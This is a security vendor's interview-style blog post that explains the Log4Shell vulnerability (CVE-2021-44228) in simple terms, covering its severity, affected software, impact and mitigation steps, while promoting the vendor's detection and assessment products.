There has been a lot of noise on Apache Log4j2 (Log4Shell) Remote Code Execution Vulnerability (CVE-2021-44228). Watch this short video on all you need to know about this vulnerability, if you are affected by it and how to mitigate it. Learn also more about the emergency response guidelines by Jason Yuan, VP – Product & Marketing, Sangfor Technologies.
Most of the documents and material available online on this vulnerability are very technical and difficult to understand. So we invited a subject matter expert to explain this to us in a simpler and easier language to understand.
Interview of Jason Yuan, VP – Product & Marketing, Sangfor Technologies
So, what’s the big deal about this Log4j2 (Log4Shell) Vulnerability?
- This is the biggest security event of the decade.
- Some says it’s the biggest security vulnerability since Internet was invented. It impacts both business and consumers.
- In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, termed the exploit "critical" and advised vendors to prioritize software updates.
- The Germany agency Federal Office for Information Security (BSI) designated the exploit as being at its highest threat level, calling it an "extremely critical threat situation" (translated)
Who might have these Apache Log4j2 (Log4Shell) CVE-2021-44228 Vulnerabilities?
- First of all, a bit technical background: Log4j2 is used by a very large percentage of the Java programs developed in the last decade for both server and client applications. Java is also one of the top programming languages used by businesses.
- Second: to answer your question, this impacts software used by enterprises and governments globally. Essentially, all industries. All geography. Sangfor’s global threat intelligence has a capability to scan around the internet to identify weak systems. Last week, shortly after we learned about this vulnerability, we identified 3000 infected servers within 1 hour. Many more in the next few days. Interestingly enough, education tops the list. My guess is that they don’t have enough IT budget to buy software; nor do they have enough security budget to secure them. However, pretty much all industries suffers.
- Third: many consumer software are impacted, here is what’s been detected in the past few days: Bluetooth headphone. If you play games, MineCraft allows other games users to turn your machine into a crypto miner. On the internet, someone managed to demonstrate this vulnerability on iCloud. Such weakness has been found on the most popular e-commerce websites. On even more dangerous side: a successful POC has been performed on a top branded automotive entertainment system.
What’s the potential impact of Log4j2 (Log4Shell) CVE-2021-44228 Vulnerability?
- This is a zero day arbitrary code execution. It’s characterized as the “single biggest, most critical vulnerability of the last decade”.
- This allows remote code execution without credentials. Meaning, someone can take over your system , which means they can run any code and access all data on the affected machine. It also allows them to delete or encrypt files and hold them for ransom.
- However, it’s not very difficult attack. And it does not require sophisticated software programming experience.
- All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
How about customers with their own software?
Any customers with some open-source software might be subject to such attack as well.
Apache Software Foundation assigned the maximum CVSS severity rating of 10 to Log4Shell, as millions of servers could be potentially vulnerable by the exploit.
The security of supply chain is demonstrated to be very important.
What’s going on in the past few days on CVE-2021-44228 Vulnerability?
- Security responders within software companies are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely.
- At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
- We forecast many new ransomware to leverage this vulnerability in the coming weeks.
What do you suggest our customers do next?
- Self assess your own exposure ASAP. Some can be done in hours, others may take weeks. You will need to check your software and hardware provider.
- In the case you need a quicker assessment, I would like to suggest that you work with vendors like ourselves to help you with an automated assessment. Here are some examples,
- From your network traffic, our Network Traffic Analysis can detect any software within your network that uses the vulnerable Log4j2 versions
- From server point of view, we have software tools to help you to get a list of assets that contains all software used, and can further identify the vulnerable systems.
Once I have uncovered my vulnerabilities of Log4j2 (Log4Shell) CVE-2021-44228, what should I do next?
- Patch if you can.
- However, many software can not be patched. As they might be running legacy software, like older version of Java.
- Change configuration. There are three alternatives. We can provide the details.
- Virtual patch by FW or IPS if needed. Contact us for details.
- Deploy a NDR like ours to help you to improve asset discover, detection an response.
How would any customer know if they are compromised?
- Log review
- Most traditional tools are used for prevention. FW, AV. What you need to improve is a much stronger detection and response capability.
- Use tools such as our NDR to improve your Detection capabilities.
- Should you uncovered any security incidents, you can contact us to help you with incident response team.